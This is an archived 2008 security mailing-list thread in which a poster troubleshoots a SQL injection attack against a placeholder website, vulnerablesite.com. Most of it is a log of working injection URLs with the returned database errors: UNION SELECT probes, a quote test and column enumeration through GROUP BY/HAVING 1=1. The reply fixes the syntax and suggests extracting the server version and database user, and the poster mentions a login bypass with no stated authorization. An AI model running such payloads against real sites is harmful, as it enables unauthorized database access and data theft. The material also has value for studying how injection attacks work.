Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Web-App-Sec
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

RE: SQL Injection: Issue with UNION SELECT ALL

from [Calderon, Juan Carlos (GE, Corporate, consultant)] Network Security [Permanent Link]
Subject: RE: SQL Injection: Issue with UNION SELECT ALL
Date: Wed, 9 Jan 2008 12:17:13 -0500 
Hello Joe 

I guess you make a simple mistake the right operator is UNION ALL not SELECT 
ALL :)

I think this should work

http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION ALL SELECT 
null,null,null--

I suggest you progressively change the nulls one by one by @@version and/or 
USER to extract the first interesting pieces of information from the database

Regards,
Juan Carlos Calderon

-----Original Message-----
From: listbounce@securityfocus.com [mailto:listbounce@securityfocus.com] On 
Behalf Of Joseph McCray
Sent: MiÃrcoles, 09 de Enero de 2008 06:02 a.m.
To: webappsec@securityfocus.com
Subject: SQL Injection: Issue with UNION SELECT ALL

I'm really having some trouble here understanding and working through these 2 
errors I am getting when attacking a host via SQL Injection using a UNION 
SELECT ALL statement. I've listed the what I think are relevant references I've 
found on the Internet about these error messages so far, and even though this 
is probably really simple but for some reason it's just not clicking for me.

1. Operand type clash: text is incompatible with int
        Reference Found:
        http://archives.neohapsis.com/archives/sf/pentest/2003-02/0094.html

2. The text, ntext, or image data type cannot be selected as DISTINCT.
        References Found:
        http://sla.ckers.org/forum/read.php?16,14370,14372 <-- I am using UNION 
SELECT ALL

        http://p2p.wrox.com/topic.asp?whichpage=1&TOPIC_ID=7662ð; 


http://www.thedatafarm.com/blog/2005/07/12/SELECTsUNIONsAndNtextColumns.aspx 
<-- I am using UNION SELECT ALL
        
        http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=530757&SiteID=1 


The site was vulnerable to login bypass, so it's really not a matter of being 
able to "get in", I am asking for help because I want to understand the errors, 
and of course make my attack process better. 



############################################
# Can't Figure Out This UNION SELECT Stuff # 
############################################
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL 1--
        Returns:
        All queries in an SQL statement containing a UNION operator must have 
an equal number of expressions in their target lists.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL 
1,2--
        Returns:
        All queries in an SQL statement containing a UNION operator must have 
an equal number of expressions in their target lists



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL 
1,2,3--
        Returns:
        Operand type clash: text is incompatible with int

        Reference Found:
        http://archives.neohapsis.com/archives/sf/pentest/2003-02/0094.html


So I tried this:
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL 
null--
        Returns:
        All queries in an SQL statement containing a UNION operator must have 
an equal number of expressions in their target lists.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL 
null,null--
        Returns:
        All queries in an SQL statement containing a UNION operator must have 
an equal number of expressions in their target lists



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL 
null,null,null--
        Returns:
        The text, ntext, or image data type cannot be selected as DISTINCT.


        References Found:
        http://sla.ckers.org/forum/read.php?16,14370,14372 <-- I am using UNION 
SELECT ALL

        http://p2p.wrox.com/topic.asp?whichpage=1&TOPIC_ID=7662ð; <-- I am 
using UNION SELECT ALL


http://www.thedatafarm.com/blog/2005/07/12/SELECTsUNIONsAndNtextColumns.aspx 
<-- I am using UNION SELECT ALL
        
        http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=530757&SiteID=1
<-- Hmmm...Need to get a grip on this.




#####################################
# Table/Column Name Enum works fine #
#####################################
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345
        Returns: 
        Valid page


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345'
        Returns: 
        Microsoft OLE DB Provider for SQL Server error '80040e14' 
        Unclosed quotation mark before the character string ''.


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 having 1=1--
        Returns:
        Column 'a.id' is invalid in the select list because it is not contained 
in an aggregate function and there is no GROUP BY clause.


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by a.id having 
1=1--
        Returns:
        Column 'a.Title' is invalid in the select list because it is not 
contained in either an aggregate function or the GROUP BY clause


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by 
a.id,a.Title having 1=1--
        Returns:
        Column 'a.Content' is invalid in the select list because it is not 
contained in either an aggregate function or the GROUP BY clause.


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by 
a.id,a.Title,a.Content having 1=1--
        Returns:
        Column 'a.priority' is invalid in the select list because it is not 
contained in either an aggregate function or the GROUP BY clause.


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by 
a.id,a.Title,a.Content,a.priority having 1=1--
        Returns:
        Column 'a.html' is invalid in the select list because it is not 
contained in either an aggregate function or the GROUP BY clause.


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by 
a.id,a.Title,a.Content,a.priority,a.html having 1=1--
        Returns:
        Column 'a.link' is invalid in the select list because it is not 
contained in either an aggregate function or the GROUP BY clause.


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by 
a.id,a.Title,a.Content,a.priority,a.html,a.link having 1=1--
        Returns:
        Column 'a.url' is invalid in the select list because it is not 
contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url having 1=1--      
        Returns:
        Column 'a.parent' is invalid in the select list because it is not 
contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by 
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent having
1=1--
        Returns:
Column 'a.static_index' is invalid in the select list because it is not 
contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by 
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index 
having 1=1--
        Returns:
        Column 'a.hidden' is invalid in the select list because it is not 
contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by 
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden
 having 1=1--
        Returns:
        Column 'a.approved' is invalid in the select list because it is not 
contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by 
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved
 having 1=1--
        Returns:
        Column 'a.AutoApprove' is invalid in the select list because it is not 
contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by 
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove
 having 1=1--
        Returns:
        Column 'a.AutoDisapprove' is invalid in the select list because it is 
not contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by 
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove
 having 1=1--
        Returns:
        Column 'a.lvl' is invalid in the select list because it is not 
contained in either an aggregate function or the GROUP BY clause



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by 
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove,a.lvl
 having 1=1--
        Returns:
        Column 'a.membertypes' is invalid in the select list because it is not 
contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by 
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove,a.lvl,a.membertypes
 having 1=1--
        Returns:
        Column 'a.lastupdated_time' is invalid in the select list because it is 
not contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by 
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove,a.lvl,a.membertypes,a.lastupdated_time
 having 1=1--
        Returns:
        You have submitted an invalid keyword(s).
Please contact CompanyXYZ support if you had the need to use those keyword(s)...


Microsoft VBScript runtime error '800a01a8'

Object required: 'getrecordset(...)' 




You have submitted an invalid keyword(s).
Please contact CompanyXYZ support if you had the need to use those keyword(s)...


Microsoft VBScript runtime error '800a01a8'

Object required: 'getrecordset(...)' You have submitted an invalid keyword(s).
Please contact CompanyXYZ support if you had the need to use those keyword(s)...


Microsoft VBScript runtime error '800a01a8'

Object required: 'getrecordset(...)' 





        

--
Joe McCray
Toll Free:  1-866-892-2132
Email:      joe@learnsecurityonline.com
Web:        https://www.learnsecurityonline.com


Learn Security Online, Inc.

* Security Games        * Simulators
* Challenge Servers     * Courses
* Hacking Competitions  * Hacklab Access

"The only thing worse than training good employees and losing them 
is NOT training your employees and keeping them." 

        - Zig Ziglar
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  SQL Injection: Issue with UNION SELECT ALL, Joseph McCray
Next by Date:  OWASP Asia Pacific & Australia Application Security Conference FEB 2008, Justin Derry
Previous by Thread:  SQL Injection: Issue with UNION SELECT ALL, Joseph McCray
Next by Thread:  OWASP Asia Pacific & Australia Application Security Conference FEB 2008, Justin Derry
Indexes:  [Date] [Thread] [Top] [All Lists]